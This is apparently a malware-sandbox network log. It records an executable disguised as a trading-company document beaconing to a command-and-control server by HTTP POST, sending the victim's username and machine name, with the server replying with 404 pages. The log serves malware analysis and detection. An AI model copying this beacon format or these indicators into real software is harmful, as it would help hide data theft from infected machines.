Aug 3, 2021 08:12:27.484932899 CEST	5875	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Aug 3, 2021 08:12:27.485558033 CEST	5877	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Aug 3, 2021 08:12:27.485590935 CEST	5878	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Aug 3, 2021 08:12:27.485644102 CEST	5879	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Aug 3, 2021 08:12:27.485672951 CEST	5881	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Aug 3, 2021 08:12:27.486145020 CEST	5882	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Aug 3, 2021 08:12:27.486296892 CEST	5883	IN	Data Raw: 2d 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e Data Ascii: -info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-ima

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49754	185.227.139.18	80	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 08:12:27.995006084 CEST	5884	OUT	POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.227.139.18 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 976E9D7A Content-Length: 190 Connection: close
Aug 3, 2021 08:12:28.138072014 CEST	5884	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 38 00 31 00 35 00 39 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz181598DESKTOP-716T771+08F9C4E9C79A3B52B3F739430tEale
Aug 3, 2021 08:12:28.866781950 CEST	5886	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Aug 2021 06:12:28 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Aug 3, 2021 08:12:28.866821051 CEST	5887	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Aug 3, 2021 08:12:28.867089987 CEST	5889	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Aug 3, 2021 08:12:28.867142916 CEST	5890	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Aug 3, 2021 08:12:28.868715048 CEST	5891	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Aug 3, 2021 08:12:28.868745089 CEST	5893	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Aug 3, 2021 08:12:28.868798971 CEST	5894	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Aug 3, 2021 08:12:28.868832111 CEST	5895	IN	Data Raw: 2d 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e Data Ascii: -info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-ima

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49755	185.227.139.18	80	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 08:12:29.223743916 CEST	5896	OUT	POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.227.139.18 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 976E9D7A Content-Length: 163 Connection: close
Aug 3, 2021 08:12:29.366456985 CEST	5896	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 38 00 31 00 35 00 39 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz181598DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 3, 2021 08:12:30.140487909 CEST	5898	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Aug 2021 06:12:29 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Aug 3, 2021 08:12:30.140530109 CEST	5899	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Aug 3, 2021 08:12:30.140746117 CEST	5901	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Aug 3, 2021 08:12:30.140779972 CEST	5902	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Aug 3, 2021 08:12:30.141019106 CEST	5903	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Aug 3, 2021 08:12:30.141048908 CEST	5905	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Aug 3, 2021 08:12:30.141268969 CEST	5906	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Aug 3, 2021 08:12:30.141295910 CEST	5907	IN	Data Raw: 2d 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e Data Ascii: -info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-ima

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
